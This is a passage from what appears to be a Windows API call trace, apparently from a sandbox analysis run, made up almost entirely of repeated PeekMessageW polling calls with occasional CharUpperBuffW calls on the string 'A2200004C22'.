lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.298] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.299] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.300] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.301] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.302] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.303] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.304] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 